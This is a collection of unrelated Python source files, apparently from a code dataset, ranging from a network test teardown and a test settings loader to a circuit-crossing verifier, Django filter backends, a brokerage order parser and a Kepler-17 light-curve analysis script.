"router_mac": host_facts['ansible_Ethernet0']['macaddress'],
"fib_info": "/root/bgp_speaker_route.txt",
"ipv4": ipv4,
"ipv6": ipv6,
"testbed_mtu": mtu },
log_file="/tmp/bgp_speaker_test.FibTest.log",
socket_recv_size=16384)
res = ptfhost.shell("pkill exabgp || true")
for ip in vlan_ips:
host.command("ip route flush %s/32" % ip.ip)
ptfhost.shell("ip addr flush dev eth{}".format(mg_facts['minigraph_port_indices'][mg_facts['minigraph_vlans'][mg_facts['minigraph_vlan_interfaces'][0]['attachto']]['members'][0]])) | 0.283881 | 0.167083 |
import os
import inspect
from ..utils.import_helper import ImportHelper
from ..core.errors import ImproperlyConfigured
from . import global_settings
from ..utils.lazy_obj import empty, LazyObject
__all__ = ['settings', 'SettingsFileFinder']
class SettingsFileFinder(object):
def __init__(self, settings_file_name='settings.py'):
self.__settings_file_name = settings_file_name
def is_py_package(self, dirpath):
return os.path.isdir(dirpath) and os.path.isfile(os.path.join(dirpath, '__init__.py'))
@property
def settings_file_name(self):
return self.__settings_file_name
def __issuite(self, tc):
"A crude way to tell apart testcases and suites with duck-typing"
try:
iter(tc)
except TypeError:
return False
return True
def __all_in_one(self, tc):
alltests = []
if self.__issuite(tc):
for one in tc:
if not self.__issuite(one):
alltests.append(one)
else:
alltests.extend(self.__all_in_one(one))
else:
alltests.append(tc)
return alltests
def __is_exists_file(self, path):
return os.path.exists(path) and os.path.isfile(path)
def find_settings_file_from_start_dir(self, dirpath):
""" 从给定的目录开始查找配置文件,如果在该目录能找到配置文件,则不会遍历其子目录,否则会一直遍历。
遍历完其下所有子孙目录后,仍找不到则返回None,找到则返回完整配置文件路径
Args:
dirpath: 开始查找的目录
"""
if not os.path.isdir(dirpath):
return None
filepath = os.path.join(dirpath, self.settings_file_name)
if not self.__is_exists_file(filepath):
filepath = self.__find_settings_file_from_subdir(dirpath)
return filepath
def __find_settings_file_from_subdir(self, dirpath):
names = os.listdir(dirpath)
settings_file_path = None
for name in names:
dpath = os.path.join(dirpath, name)
if os.path.isdir(dpath):
filepath = os.path.join(dpath, self.settings_file_name)
if self.__is_exists_file(filepath):
settings_file_path = filepath
break
else:
result = self.__find_settings_file_from_subdir(dpath)
if result:
settings_file_path = result
break
return settings_file_path
def set_non_py_package_dir_as_start_dir(self, abspath):
""" 设置开始查找配置文件的目录为第一个非python包的目录,
如果给定的路径中的目录没有非python包目录,则设置当前目录为开始查找配置文件的目录
Args:
abspath: 绝对路径
"""
if not os.path.exists(abspath):
            return None
if os.path.isfile(abspath):
dirpath = os.path.dirname(abspath)
else:
dirpath = abspath
current_dirpath = dirpath
paths = []
        start_dirpath = os.path.dirname(current_dirpath)  # path from which to start looking for the settings file (sconfig.py)
while True:
if not self.is_py_package(dirpath):
start_dirpath = dirpath
break
if os.path.basename(dirpath):
paths.append(dirpath)
dirpath = os.path.dirname(dirpath)
else:
break
return start_dirpath
def find_settings_file_by_test(self, test):
used = set()
start_path = None
config_path = None
for t in self.__all_in_one(test):
mod = inspect.getmodule(t)
if mod in used:
continue
else:
used.add(mod)
file_path = os.path.abspath(mod.__file__)
start_path = self.set_non_py_package_dir_as_start_dir(file_path)
config_path = self.find_settings_file_from_start_dir(start_path)
if config_path:
break
return (start_path, config_path)
def find_settings_file_by_testcase_class(self, testclass):
start_path = None
config_path = None
mod = inspect.getmodule(testclass)
file_path = os.path.abspath(mod.__file__)
start_path = self.set_non_py_package_dir_as_start_dir(file_path)
config_path = self.find_settings_file_from_start_dir(start_path)
return (start_path, config_path)
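# A minimal sketch of driving SettingsFileFinder directly; the "tests" directory name
# below is hypothetical.
def _example_find_settings_file():
    finder = SettingsFileFinder('settings.py')
    start_dir = finder.set_non_py_package_dir_as_start_dir(os.path.abspath('tests'))
    return finder.find_settings_file_from_start_dir(start_dir) if start_dir else None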
class LazySettings(LazyObject):
"""
    The framework locates the project settings file when tests are run and calls
    load_configure_from_file() to load the configuration it contains.
"""
def _setup(self):
self._wrapped = Settings()
def __repr__(self):
# Hardcode the class name as otherwise it yields 'Settings'.
if self._wrapped is empty:
return '<LazySettings [Unevaluated]>'
return '<LazySettings "%(settings_module_file_path)s">' % {
'settings_module_file_path': self._wrapped.SETTINGS_MODULE_FILE_PATH,
}
def __getattr__(self, name):
if self._wrapped is empty:
self._setup()
val = getattr(self._wrapped, name)
self.__dict__[name] = val
return val
def __setattr__(self, name, value):
if name == '_wrapped':
self.__dict__.clear()
else:
self.__dict__.pop(name, None)
super().__setattr__(name, value)
def __delattr__(self, name):
super().__delattr__(name)
self.__dict__.pop(name, None)
def load_configure_from_file(self, settings_module_filepath, force=False):
if force or (not self.is_loaded):
if self._wrapped is empty:
self._wrapped = Settings()
self._wrapped.load(settings_module_filepath)
@property
def configured(self):
return self._wrapped is not empty
@property
def is_loaded(self):
return self.configured and self._wrapped.is_loaded
class Settings(object):
def __init__(self):
for setting in dir(global_settings):
if setting.isupper():
setattr(self, setting, getattr(global_settings, setting))
self._explicit_settings = set()
self._is_loaded = False
self.SETTINGS_MODULE_FILE_PATH = None
def load(self, settings_module_filepath):
self.SETTINGS_MODULE_FILE_PATH = settings_module_filepath
mod = ImportHelper().load_module(self.SETTINGS_MODULE_FILE_PATH)
tuple_settings = ()
for setting in dir(mod):
if setting.isupper():
setting_value = getattr(mod, setting)
if (setting in tuple_settings and not isinstance(setting_value, (list, tuple))):
raise ImproperlyConfigured("The %s setting must be a list or a tuple. " % setting)
setattr(self, setting, setting_value)
self._explicit_settings.add(setting)
self._is_loaded = True
def is_overridden(self, setting):
return setting in self._explicit_settings
@property
def is_loaded(self):
return self._is_loaded
def __repr__(self):
return '<%(cls)s "%(settings_module_file_path)s">' % {
'cls': self.__class__.__name__,
'settings_module_file_path': self.SETTINGS_MODULE_FILE_PATH,
}
settings = LazySettings() | stest/conf/__init__.py | 0.324663 | 0.09118
from sys import version_info
if version_info >= (3,0,0):
new_instancemethod = lambda func, inst, cls: _GccIter.SWIG_PyInstanceMethod_New(func)
else:
from new import instancemethod as new_instancemethod
if version_info >= (2,6,0):
def swig_import_helper():
from os.path import dirname
import imp
fp = None
try:
fp, pathname, description = imp.find_module('_GccIter', [dirname(__file__)])
except ImportError:
import _GccIter
return _GccIter
if fp is not None:
try:
_mod = imp.load_module('_GccIter', fp, pathname, description)
finally:
fp.close()
return _mod
_GccIter = swig_import_helper()
del swig_import_helper
else:
import _GccIter
del version_info
try:
_swig_property = property
except NameError:
pass # Python < 2.2 doesn't have 'property'.
def _swig_setattr_nondynamic(self,class_type,name,value,static=1):
if (name == "thisown"): return self.this.own(value)
if (name == "this"):
if type(value).__name__ == 'SwigPyObject':
self.__dict__[name] = value
return
method = class_type.__swig_setmethods__.get(name,None)
if method: return method(self,value)
if (not static):
self.__dict__[name] = value
else:
raise AttributeError("You cannot add attributes to %s" % self)
def _swig_setattr(self,class_type,name,value):
return _swig_setattr_nondynamic(self,class_type,name,value,0)
def _swig_getattr(self,class_type,name):
if (name == "thisown"): return self.this.own()
method = class_type.__swig_getmethods__.get(name,None)
if method: return method(self)
raise AttributeError(name)
def _swig_repr(self):
try: strthis = "proxy of " + self.this.__repr__()
except: strthis = ""
return "<%s.%s; %s >" % (self.__class__.__module__, self.__class__.__name__, strthis,)
try:
_object = object
_newclass = 1
except AttributeError:
class _object : pass
_newclass = 0
def _swig_setattr_nondynamic_method(set):
def set_attr(self,name,value):
if (name == "thisown"): return self.this.own(value)
if hasattr(self,name) or (name == "this"):
set(self,name,value)
else:
raise AttributeError("You cannot add attributes to %s" % self)
return set_attr
class SwigPyIterator(object):
thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
def __init__(self, *args, **kwargs): raise AttributeError("No constructor defined - class is abstract")
__repr__ = _swig_repr
__swig_destroy__ = _GccIter.delete_SwigPyIterator
def __iter__(self): return self
SwigPyIterator.value = new_instancemethod(_GccIter.SwigPyIterator_value,None,SwigPyIterator)
SwigPyIterator.incr = new_instancemethod(_GccIter.SwigPyIterator_incr,None,SwigPyIterator)
SwigPyIterator.decr = new_instancemethod(_GccIter.SwigPyIterator_decr,None,SwigPyIterator)
SwigPyIterator.distance = new_instancemethod(_GccIter.SwigPyIterator_distance,None,SwigPyIterator)
SwigPyIterator.equal = new_instancemethod(_GccIter.SwigPyIterator_equal,None,SwigPyIterator)
SwigPyIterator.copy = new_instancemethod(_GccIter.SwigPyIterator_copy,None,SwigPyIterator)
SwigPyIterator.next = new_instancemethod(_GccIter.SwigPyIterator_next,None,SwigPyIterator)
SwigPyIterator.__next__ = new_instancemethod(_GccIter.SwigPyIterator___next__,None,SwigPyIterator)
SwigPyIterator.previous = new_instancemethod(_GccIter.SwigPyIterator_previous,None,SwigPyIterator)
SwigPyIterator.advance = new_instancemethod(_GccIter.SwigPyIterator_advance,None,SwigPyIterator)
SwigPyIterator.__eq__ = new_instancemethod(_GccIter.SwigPyIterator___eq__,None,SwigPyIterator)
SwigPyIterator.__ne__ = new_instancemethod(_GccIter.SwigPyIterator___ne__,None,SwigPyIterator)
SwigPyIterator.__iadd__ = new_instancemethod(_GccIter.SwigPyIterator___iadd__,None,SwigPyIterator)
SwigPyIterator.__isub__ = new_instancemethod(_GccIter.SwigPyIterator___isub__,None,SwigPyIterator)
SwigPyIterator.__add__ = new_instancemethod(_GccIter.SwigPyIterator___add__,None,SwigPyIterator)
SwigPyIterator.__sub__ = new_instancemethod(_GccIter.SwigPyIterator___sub__,None,SwigPyIterator)
SwigPyIterator_swigregister = _GccIter.SwigPyIterator_swigregister
SwigPyIterator_swigregister(SwigPyIterator)
GccIter_CuCuCu = _GccIter.GccIter_CuCuCu
GccIter_CiCuCu = _GccIter.GccIter_CiCuCu
GccIter_CiCiCu = _GccIter.GccIter_CiCiCu
GccIter_CiLiCu = _GccIter.GccIter_CiLiCu
GccIter_LiLiCu = _GccIter.GccIter_LiLiCu
GccIter_LiCuCu = _GccIter.GccIter_LiCuCu
GccIter_CuCuOnCu = _GccIter.GccIter_CuCuOnCu
GccIter_CiCuOnCu = _GccIter.GccIter_CiCuOnCu
GccIter_LiCuOnCu = _GccIter.GccIter_LiCuOnCu
GccIter_CuPtOnCu = _GccIter.GccIter_CuPtOnCu
GccIter_CuCuOnLi = _GccIter.GccIter_CuCuOnLi
GccIter_CiCuOnLi = _GccIter.GccIter_CiCuOnLi
GccIter_LiCuOnLi = _GccIter.GccIter_LiCuOnLi
GccIter_CuPtOnLi = _GccIter.GccIter_CuPtOnLi
GccIter_CuCuOnCi = _GccIter.GccIter_CuCuOnCi
GccIter_CiCuOnCi = _GccIter.GccIter_CiCuOnCi
GccIter_LiCuOnCi = _GccIter.GccIter_LiCuOnCi
GccIter_CuPtOnCi = _GccIter.GccIter_CuPtOnCi
GccIter_CuCu = _GccIter.GccIter_CuCu
GccIter_CiCu = _GccIter.GccIter_CiCu | Lib/site-packages/OCC/GccIter.py | 0.154153 | 0.081447
import json # Used when TRACE=jsonp
import os # Used to get the TRACE environment variable
import re # Used when TRACE=jsonp
import sys # Used to smooth over the range / xrange issue.
import aug_avl
# Python 3 doesn't have xrange, and range behaves like xrange.
if sys.version_info >= (3,):
xrange = range
# Circuit verification library.
class Wire(object):
"""A wire in an on-chip circuit.
Wires are immutable, and are either horizontal or vertical.
"""
def __init__(self, name, x1, y1, x2, y2):
"""Creates a wire.
    Raises a ValueError if the coordinates do not form a horizontal wire
    or a vertical wire.
Args:
name: the wire's user-visible name
x1: the X coordinate of the wire's first endpoint
y1: the Y coordinate of the wire's first endpoint
x2: the X coordinate of the wire's last endpoint
y2: the Y coordinate of the wire's last endpoint
"""
# Normalize the coordinates.
if x1 > x2:
x1, x2 = x2, x1
if y1 > y2:
y1, y2 = y2, y1
self.name = name
self.x1, self.y1 = x1, y1
self.x2, self.y2 = x2, y2
self.object_id = Wire.next_object_id()
if not (self.is_horizontal() or self.is_vertical()):
raise ValueError(str(self) + ' is neither horizontal nor vertical')
def is_horizontal(self):
"""True if the wire's endpoints have the same Y coordinates."""
return self.y1 == self.y2
def is_vertical(self):
"""True if the wire's endpoints have the same X coordinates."""
return self.x1 == self.x2
def intersects(self, other_wire):
"""True if this wire intersects another wire."""
# NOTE: we assume that wires can only cross, but not overlap.
if self.is_horizontal() == other_wire.is_horizontal():
return False
if self.is_horizontal():
h = self
v = other_wire
else:
h = other_wire
v = self
return v.y1 <= h.y1 and h.y1 <= v.y2 and h.x1 <= v.x1 and v.x1 <= h.x2
def __repr__(self):
# :nodoc: nicer formatting to help with debugging
return('<wire ' + self.name + ' (' + str(self.x1) + ',' + str(self.y1) +
')-(' + str(self.x2) + ',' + str(self.y2) + ')>')
def as_json(self):
"""Dict that obeys the JSON format restrictions, representing the wire."""
return {'id': self.name, 'x': [self.x1, self.x2], 'y': [self.y1, self.y2]}
# Next number handed out by Wire.next_object_id()
_next_id = 0
@staticmethod
def next_object_id():
"""Returns a unique numerical ID to be used as a Wire's object_id."""
id = Wire._next_id
Wire._next_id += 1
return id
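# Hedged sanity-check sketch: the two wires below are illustrative values, not
# part of any real layout. A horizontal and a vertical wire whose spans overlap
# should report an intersection in both directions.
#
#   h = Wire('h1', 0, 5, 10, 5)   # horizontal segment at y=5
#   v = Wire('v1', 3, 0, 3, 9)    # vertical segment at x=3
#   assert h.intersects(v) and v.intersects(h)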
class WireLayer(object):
"""The layout of one layer of wires in a chip."""
def __init__(self):
"""Creates a layer layout with no wires."""
self.wires = {}
  def wire_list(self):
    """The wires in the layout.
    (The ``wires`` dict assigned in ``__init__`` shadows an instance method of
    the same name, hence the distinct accessor name; the original method also
    never returned its result.)"""
    return self.wires.values()
def add_wire(self, name, x1, y1, x2, y2):
"""Adds a wire to a layer layout.
Args:
name: the wire's unique name
x1: the X coordinate of the wire's first endpoint
y1: the Y coordinate of the wire's first endpoint
x2: the X coordinate of the wire's last endpoint
y2: the Y coordinate of the wire's last endpoint
Raises an exception if the wire isn't perfectly horizontal (y1 = y2) or
perfectly vertical (x1 = x2)."""
if name in self.wires:
raise ValueError('Wire name ' + name + ' not unique')
self.wires[name] = Wire(name, x1, y1, x2, y2)
def as_json(self):
"""Dict that obeys the JSON format restrictions, representing the layout."""
return { 'wires': [wire.as_json() for wire in self.wires.values()] }
@staticmethod
def from_file(file):
"""Builds a wire layer layout by reading a textual description from a file.
Args:
file: a File object supplying the input
Returns a new Simulation instance."""
layer = WireLayer()
while True:
command = file.readline().split()
if command[0] == 'wire':
coordinates = [float(token) for token in command[2:6]]
layer.add_wire(command[1], *coordinates)
elif command[0] == 'done':
break
return layer
class RangeIndex(object):
"""Array-based range index implementation."""
def __init__(self):
"""Initially empty range index."""
self.data = aug_avl.AugAVL()
def add(self, key):
"""Inserts a key in the range index."""
if key is None:
raise ValueError('Cannot insert nil in the index')
self.data.insert(key)
def remove(self, key):
"""Removes a key from the range index."""
self.data.delete(key)
def list(self, first_key, last_key):
"""List of values for the keys that fall within [first_key, last_key]."""
return self.data.list(first_key, last_key)
def count(self, first_key, last_key):
"""Number of keys that fall within [first_key, last_key]."""
return self.data.count(first_key, last_key)
class TracedRangeIndex(RangeIndex):
"""Augments RangeIndex to build a trace for the visualizer."""
def __init__(self, trace):
"""Sets the object receiving tracing info."""
RangeIndex.__init__(self)
self.trace = trace
def add(self, key):
self.trace.append({'type': 'add', 'id': key.wire.name})
RangeIndex.add(self, key)
def remove(self, key):
self.trace.append({'type': 'delete', 'id': key.wire.name})
RangeIndex.remove(self, key)
def list(self, first_key, last_key):
result = RangeIndex.list(self, first_key, last_key)
self.trace.append({'type': 'list', 'from': first_key.key,
'to': last_key.key,
'ids': [key.wire.name for key in result]})
return result
def count(self, first_key, last_key):
result = RangeIndex.count(self, first_key, last_key)
self.trace.append({'type': 'list', 'from': first_key.key,
'to': last_key.key, 'count': result})
return result
class ResultSet(object):
"""Records the result of the circuit verifier (pairs of crossing wires)."""
def __init__(self):
"""Creates an empty result set."""
self.crossings = []
def add_crossing(self, wire1, wire2):
"""Records the fact that two wires are crossing."""
self.crossings.append(sorted([wire1.name, wire2.name]))
def write_to_file(self, file):
"""Write the result to a file."""
for crossing in self.crossings:
file.write(' '.join(crossing))
file.write('\n')
class TracedResultSet(ResultSet):
"""Augments ResultSet to build a trace for the visualizer."""
def __init__(self, trace):
"""Sets the object receiving tracing info."""
ResultSet.__init__(self)
self.trace = trace
def add_crossing(self, wire1, wire2):
self.trace.append({'type': 'crossing', 'id1': wire1.name,
'id2': wire2.name})
ResultSet.add_crossing(self, wire1, wire2)
class KeyWirePair(object):
"""Wraps a wire and the key representing it in the range index.
Once created, a key-wire pair is immutable."""
def __init__(self, key, wire):
"""Creates a new key for insertion in the range index."""
self.key = key
if wire is None:
raise ValueError('Use KeyWirePairL or KeyWirePairH for queries')
self.wire = wire
self.wire_id = wire.object_id
def __lt__(self, other):
# :nodoc: Delegate comparison to keys.
return (self.key < other.key or
(self.key == other.key and self.wire_id < other.wire_id))
def __le__(self, other):
# :nodoc: Delegate comparison to keys.
return (self.key < other.key or
(self.key == other.key and self.wire_id <= other.wire_id))
def __gt__(self, other):
# :nodoc: Delegate comparison to keys.
return (self.key > other.key or
(self.key == other.key and self.wire_id > other.wire_id))
def __ge__(self, other):
# :nodoc: Delegate comparison to keys.
return (self.key > other.key or
(self.key == other.key and self.wire_id >= other.wire_id))
def __eq__(self, other):
# :nodoc: Delegate comparison to keys.
return self.key == other.key and self.wire_id == other.wire_id
  def __ne__(self, other):
    # :nodoc: Delegate comparison to keys; inequality is the negation of __eq__.
    return not (self.key == other.key and self.wire_id == other.wire_id)
  def __hash__(self):
    # :nodoc: Hash on an immutable tuple (a list is not hashable).
    return hash((self.key, self.wire_id))
def __repr__(self):
# :nodoc: nicer formatting to help with debugging
return '<key: ' + str(self.key) + ' wire: ' + str(self.wire) + '>'
class KeyWirePairL(KeyWirePair):
"""A KeyWirePair that is used as the low end of a range query.
This KeyWirePair is smaller than all other KeyWirePairs with the same key."""
def __init__(self, key):
self.key = key
self.wire = None
self.wire_id = -1000000000
class KeyWirePairH(KeyWirePair):
"""A KeyWirePair that is used as the high end of a range query.
This KeyWirePair is larger than all other KeyWirePairs with the same key."""
def __init__(self, key):
self.key = key
self.wire = None
# HACK(pwnall): assuming 1 billion objects won't fit into RAM.
self.wire_id = 1000000000
class CrossVerifier(object):
"""Checks whether a wire network has any crossing wires."""
def __init__(self, layer):
"""Verifier for a layer of wires.
Once created, the verifier can list the crossings between wires (the
wire_crossings method) or count the crossings (count_crossings)."""
self.events = []
self._events_from_layer(layer)
self.events.sort()
self.index = RangeIndex()
self.result_set = ResultSet()
self.performed = False
def count_crossings(self):
"""Returns the number of pairs of wires that cross each other."""
if self.performed:
      raise RuntimeError('crossings have already been computed for this verifier')
self.performed = True
return self._compute_crossings(True)
def wire_crossings(self):
"""An array of pairs of wires that cross each other."""
if self.performed:
      raise RuntimeError('crossings have already been computed for this verifier')
self.performed = True
return self._compute_crossings(False)
def _events_from_layer(self, layer):
"""Populates the sweep line events from the wire layer."""
left_edge = min([wire.x1 for wire in layer.wires.values()])
for wire in layer.wires.values():
if wire.is_horizontal():
self.events.append([wire.x1, 0, wire.object_id, 'add', wire])
self.events.append([wire.x2, 2, wire.object_id, 'remove', wire])
else:
self.events.append([wire.x1, 1, wire.object_id, 'query', wire])
def _compute_crossings(self, count_only):
"""Implements count_crossings and wire_crossings."""
if count_only:
result = 0
else:
result = self.result_set
for event in self.events:
event_x, event_type, wire = event[0], event[3], event[4]
if event_type == 'add':
self.trace_sweep_line(wire.x1)
self.index.add(KeyWirePair(wire.y1, wire))
elif event_type == 'remove':
self.trace_sweep_line(wire.x2)
self.index.remove(KeyWirePair(wire.y1, wire))
elif event_type == 'query':
self.trace_sweep_line(event_x)
if count_only:
result += self.index.count(KeyWirePairL(wire.y1), KeyWirePairH(wire.y2))
else:
cross_wires = []
for kwp in self.index.list(KeyWirePairL(wire.y1), KeyWirePairH(wire.y2)):
cross_wires.append(kwp.wire)
for cross_wire in cross_wires:
result.add_crossing(wire, cross_wire)
return result
def trace_sweep_line(self, x):
"""When tracing is enabled, adds info about where the sweep line is.
Args:
x: the coordinate of the vertical sweep line
"""
# NOTE: this is overridden in TracedCrossVerifier
pass
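# Hedged usage sketch: the wire names and coordinates below are made up. The
# verifier consumes a WireLayer, sweeps left to right, and either counts or
# lists the crossings; each verifier instance may be used for only one query.
#
#   layer = WireLayer()
#   layer.add_wire('h1', 0, 5, 10, 5)   # horizontal
#   layer.add_wire('v1', 3, 0, 3, 9)    # vertical, crosses h1
#   print(CrossVerifier(layer).count_crossings())          # -> 1
#   for w1, w2 in CrossVerifier(layer).wire_crossings().crossings:
#       print(w1, w2)                                       # -> h1 v1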
class TracedCrossVerifier(CrossVerifier):
"""Augments CrossVerifier to build a trace for the visualizer."""
def __init__(self, layer):
CrossVerifier.__init__(self, layer)
self.trace = []
self.index = TracedRangeIndex(self.trace)
self.result_set = TracedResultSet(self.trace)
def trace_sweep_line(self, x):
self.trace.append({'type': 'sweep', 'x': x})
def trace_as_json(self):
"""List that obeys the JSON format restrictions with the verifier trace."""
return self.trace
# Command-line controller.
if __name__ == '__main__':
import sys
layer = WireLayer.from_file(sys.stdin)
verifier = CrossVerifier(layer)
if os.environ.get('TRACE') == 'jsonp':
verifier = TracedCrossVerifier(layer)
result = verifier.wire_crossings()
json_obj = {'layer': layer.as_json(), 'trace': verifier.trace_as_json()}
sys.stdout.write('onJsonp(')
json.dump(json_obj, sys.stdout)
sys.stdout.write(');\n')
elif os.environ.get('TRACE') == 'list':
verifier.wire_crossings().write_to_file(sys.stdout)
else:
    sys.stdout.write(str(verifier.count_crossings()) + "\n") | Problem sets/PS3/circuit2/circuit2.py | 0.651577 | 0.467089
from typing import Type
import coreapi
import coreschema
from django.db.models import Choices, IntegerChoices
from rest_framework.filters import BaseFilterBackend
class BaseKeyFilter(BaseFilterBackend):
"""Filter by foreign or primary key implementation."""
key: str
def _get_pk_parameter(self, params):
if self.key not in params:
return None
else:
return [int(key) for key in params[self.key].split(",")]
def filter_queryset(self, request, queryset, view):
"""Parse pk parameter, filter results."""
params = request.query_params
filtered_ids = self._get_pk_parameter(params)
if filtered_ids is not None:
queryset = queryset.filter(**{f"{self.key}__in": filtered_ids})
return queryset
def get_schema_fields(self, view):
"""Return schema for filter parameters."""
return [
coreapi.Field(
name=self.key,
required=False,
location="query",
schema=coreschema.String(description=f"filter objects by {self.key}"),
),
]
class BaseChoicesFilter(BaseFilterBackend):
"""Filter by choice field implementation."""
choices: Type[Choices] # allowed choices
field: str # choice field
def _get_choice_parameter(self, params):
"""Filter unsupported values"""
if self.field not in params:
return None
else:
return [
choice
for choice in params[self.field].split(",")
if choice in self.choices.values
]
def filter_queryset(self, request, queryset, view):
"""Parse choice field parameter, filter results."""
params = request.query_params
filtered_choices = self._get_choice_parameter(params)
if filtered_choices is not None:
queryset = queryset.filter(**{f"{self.field}__in": filtered_choices})
return queryset
def get_schema_fields(self, view):
"""Return schema for filter parameters."""
return [
coreapi.Field(
name=self.field,
required=False,
location="query",
schema=coreschema.String(
description=f"filter objects by {self.field}",
),
),
]
class BaseIntegerChoicesFilter(BaseChoicesFilter):
"""Filter by integer choice field implementation."""
    choices: Type[IntegerChoices]
def _get_choice_parameter(self, params):
"""Filter unsupported values"""
if self.field not in params:
return None
else:
            return [
                int(choice)
                for choice in params[self.field].split(",")
                # the allowed values are ints, so cast before the membership test
                if choice.isdigit() and int(choice) in self.choices.values
            ]
def key_filter(key_: str) -> Type[BaseKeyFilter]:
class DynamicFilter(BaseKeyFilter):
key = key_
return DynamicFilter
def choices_filter(choices_: Type[Choices], field_: str) -> Type[BaseChoicesFilter]:
class DynamicFilter(BaseChoicesFilter):
choices = choices_
field = field_
return DynamicFilter
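# Hedged usage sketch: ``OrderViewSet``, ``Order``, ``OrderSerializer`` and
# ``OrderStatus`` are hypothetical names used only to illustrate wiring the
# factories into a DRF view; they are not part of this module.
#
#   class OrderViewSet(viewsets.ModelViewSet):
#       queryset = Order.objects.all()
#       serializer_class = OrderSerializer
#       filter_backends = [
#           key_filter("customer"),                  # ?customer=1,2
#           choices_filter(OrderStatus, "status"),   # ?status=open,closed
#       ]
#
# Each factory returns a BaseFilterBackend subclass, so DRF instantiates and
# applies it per request like any other filter backend.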
def integer_choices_filter(
    choices_: Type[IntegerChoices], field_: str
) -> Type[BaseIntegerChoicesFilter]:
class DynamicFilter(BaseIntegerChoicesFilter):
choices = choices_
field = field_
    return DynamicFilter | django_boilerplate/common/drf_helpers/filters.py | 0.845017 | 0.206844
import re
from typing import List
from bs4 import BeautifulSoup
from ...orders.pending.models import PendingOrder
from ...utils.input import InputHelper
def parse_pending_orders(account_id: int, pending_orders_html: str) -> List[PendingOrder]:
pending_orders = []
soup = BeautifulSoup(pending_orders_html, 'html.parser')
pending_orders_table = soup.select_one('table[summary="Your current pending orders"]')
if pending_orders_table is None:
return pending_orders
# Order date Code Quantity Stock Order type Limit price Status Cancel
header_rows = pending_orders_table.select("thead > tr > th")
if len(header_rows) != 8:
raise Exception(
f"Unexpected number of header rows({len(header_rows)}), see HTML for more details",
pending_orders_table.text)
row_data = []
table_rows = pending_orders_table.select("tbody > tr")
for table_row in table_rows:
row_cells = table_row.select("td")
if len(row_cells) != 8:
raise Exception(f"Unexpected number of cells({len(row_cells)}), see HTML for more details",
pending_orders_table.text)
cell_data = {}
for col_index in range(len(header_rows)):
item_key = header_rows[col_index].get_text(strip=True, separator=' ')
if item_key == 'Cancel':
cancel_button = row_cells[col_index].select_one('button')
item_value = re.findall("value='(\\d*)'", cancel_button.attrs['onclick'])[0]
else:
item_value = row_cells[col_index].get_text(strip=True, separator=' ')
cell_data[item_key] = item_value
row_data.append(cell_data)
for row in row_data:
order_id = InputHelper.parse_int(row['Cancel'])
order_date = InputHelper.parse_date(input_txt=row['Order date'], date_format='%d/%m/%y')
trade_type = str(pending_orders_table.select_one(f"input[name='{order_id}_trade_type[]']").attrs['value'])
sedol_code = str(pending_orders_table.select_one(f"input[name='{order_id}_sedol[]']").attrs['value'])
stock_title = str(pending_orders_table.select_one(f"input[name='{order_id}_stoktitle[]']").attrs['value'])
quantity = InputHelper.parse_float(
pending_orders_table.select_one(f"input[name='{order_id}_quantity[]']").attrs['value'])
qty_is_money = InputHelper.parse_bool(
pending_orders_table.select_one(f"input[name='{order_id}_qty_is_money[]']").attrs['value'])
limit_price = InputHelper.parse_float(row['Limit price'], default_empty=None, empty_values=['', '-'])
status = str(row['Status'])
pending_order = PendingOrder(
account_id=account_id,
order_id=order_id,
order_date=order_date,
trade_type=trade_type,
sedol_code=sedol_code,
stock_title=stock_title,
quantity=quantity,
qty_is_money=qty_is_money,
limit_price=limit_price,
status=status
)
pending_orders.append(pending_order)
    return pending_orders | hargreaves/orders/pending/parsers.py | 0.404743 | 0.144873
from __future__ import absolute_import, print_function
from glob import glob
from friedrich.lightcurve import (LightCurve, generate_lc_depth,
kepler17_params_db)
from friedrich.fitting import peak_finder, summed_gaussians, gaussian
import matplotlib.pyplot as plt
import numpy as np
from astropy.utils.console import ProgressBar
# Settings:
plots = True
light_curve_paths = glob('/Users/bmmorris/data/kepler17/*slc.fits')
depth = 0.13031**2
kepler17_params = kepler17_params_db()
# Construct light curve object from the raw data
whole_lc = LightCurve.from_raw_fits(light_curve_paths, name='Kepler17')
transits = LightCurve(**whole_lc.mask_out_of_transit(kepler17_params)
).get_transit_light_curves(kepler17_params)
delta_chi2 = {}
with ProgressBar(len(transits)) as bar:
for i, lc in enumerate(transits):
# Remove linear out-of-transit trend from transit
lc.remove_linear_baseline(kepler17_params)
# Subtract out a transit model
transit_model = generate_lc_depth(lc.times_jd, depth, kepler17_params)
residuals = lc.fluxes - transit_model
# Find peaks in the light curve residuals
best_fit_params = peak_finder(lc.times.jd, residuals, lc.errors,
kepler17_params)
best_fit_gaussian_model = summed_gaussians(lc.times.jd, best_fit_params)
# Measure delta chi^2
chi2_transit = np.sum((lc.fluxes - transit_model)**2 /
lc.errors**2)/len(lc.fluxes)
if best_fit_params is not None:
            split_input_parameters = np.split(np.array(best_fit_params),
                                              len(best_fit_params) // 3)
delta_chi2[i] = []
for amplitude, t0, sigma in split_input_parameters:
model_i = gaussian(lc.times.jd, amplitude, t0, sigma)
chi2_bumps = np.sum((lc.fluxes - transit_model - model_i)**2 /
lc.errors**2)/len(lc.fluxes)
delta_chi2[i].append(np.abs(chi2_transit - chi2_bumps))
if plots:
fig, ax = plt.subplots(3, 1, figsize=(8, 14), sharex=True)
ax[0].errorbar(lc.times.jd, lc.fluxes, lc.errors, fmt='.',
color='k')
ax[0].plot(lc.times.jd, transit_model, 'r')
ax[0].set(ylabel='Flux')
ax[1].axhline(0, color='gray', ls='--')
ax[1].errorbar(lc.times.jd, lc.fluxes - transit_model,
fmt='.', color='k')
ax[1].plot(lc.times.jd, best_fit_gaussian_model, color='r')
ax[1].set_ylabel('Transit Residuals')
ax[2].axhline(0, color='gray', ls='--')
ax[2].errorbar(lc.times.jd, lc.fluxes - transit_model -
best_fit_gaussian_model, fmt='.', color='k')
ax[2].set_ylabel('Gaussian Residuals')
            ax[2].set_title(r'$\Delta \chi^2$ = '+'{0}'
.format(delta_chi2[i]))
fig.savefig('plots/{0:03d}.png'.format(i))
#plt.show()
plt.close()
bar.update()
all_delta_chi2 = np.concatenate(list(delta_chi2.values())).ravel()
fig, ax = plt.subplots(1,figsize=(12, 6))
ax.plot(np.log10(all_delta_chi2), '.')
plt.show() | example_k17.py | 0.769946 | 0.354517
from typing import Optional, Sequence
import numpy as np
from fastmri.data.subsample import MaskFunc, RandomMaskFunc
def create_mask_for_mask_type(
mask_type_str: str,
center_fractions: Sequence[float],
accelerations: Sequence[int],
